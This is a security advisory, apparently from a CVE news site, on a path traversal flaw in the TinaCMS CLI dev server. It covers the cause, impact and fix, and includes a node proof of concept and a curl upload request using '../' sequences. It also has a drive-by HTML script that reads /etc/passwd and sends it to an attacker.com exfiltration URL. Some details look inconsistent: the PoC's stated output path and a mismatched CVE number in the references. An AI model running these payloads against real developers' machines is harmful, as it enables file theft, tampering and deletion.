TinaCMS CLI, Path Traversal, CVE-2026-28793 (High)

Listen to this Post

The vulnerability is caused by the insecure use of `path.join()` on lines 42-43 of the `media.ts` file in the TinaCMS development server. The code takes a user-supplied path from the URL, decodes it, splits it by slashes, and joins it to the media directory. The `path.join()` function automatically resolves `../` sequences, allowing an attacker to break out of the intended media folder. This leads to arbitrary file write via the upload handler, arbitrary file deletion via the delete handler, and directory enumeration via the list handler. While HTTP servers like Vite may normalize the path in default configurations, the underlying code remains vulnerable, especially when deployed behind reverse proxies that preserve raw paths .
Platform: @tinacms/cli
Version: 2.0.5
Vulnerability: Path Traversal
Severity: High (8.1)
Date: 2026-03-12

Prediction: Patch 7 days

What Undercode Say:

Analytics

The vulnerable code pattern exists in multiple endpoints including upload, delete, and list handlers. The same logic is also present in Express-based server files, widening the attack surface. The issue stems from missing validation after path resolution, allowing directory traversal sequences to escape the media root.

Bash/PoC

Direct code test (no server required)
node -e "
const path = require('path');
const mediaFolder = '/tmp/tinacms-test/public/uploads';
const maliciousInput = '../../../tmp/evil.txt';
const saveTo = path.join(mediaFolder, ...maliciousInput.split('/'));
console.log('Resolves to:', saveTo);
// Output: /tmp/tmp/evil.txt (outside media folder)
"
HTTP test (may be mitigated by Vite normalization)
curl -X POST http://localhost:4001/media/upload/../../../tmp/evil.txt \
-F "[email protected]"
Attacker's JavaScript for drive-by attack (CORS + Path Traversal)
cat > evil.html << 'EOF'

<script>
fetch('http://localhost:4001/../../../etc/passwd')
.then(r => r.text())
.then(data => {
new Image().src = 'http://attacker.com/exfil?data=' + encodeURIComponent(data);
});
</script>

EOF

Exploit

An attacker can chain this path traversal with permissive CORS headers (Access-Control-Allow-Origin: `) to perform drive-by attacks. By tricking a developer into visiting a malicious site while `tinacms dev runs locally, the attacker’s JavaScript can read, write, or delete arbitrary files on the developer’s machine without any authentication .

Protection

Upgrade to `@tinacms/cli` version 2.1.8 or later. The fix adds validation to ensure resolved paths stay within the media directory. For custom implementations, validate that `path.resolve(saveTo)` starts with `path.resolve(mediaFolder) + path.sep` before writing or deleting files .

Impact

Developers running `tinacms dev` are affected, especially if the dev server is exposed to networks. Successful exploitation allows remote code execution via writing malicious files to executable paths, SSH key theft, source code modification, and denial of service through critical file deletion .

References

  • https://nvd.nist.gov/vuln/detail/CVE-2026-28793
  • https://github.com/tinacms/tinacms/security/advisories/GHSA-8pw3-9m7f-q734
  • https://app.opencve.io/cve/CVE-2026-28792

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top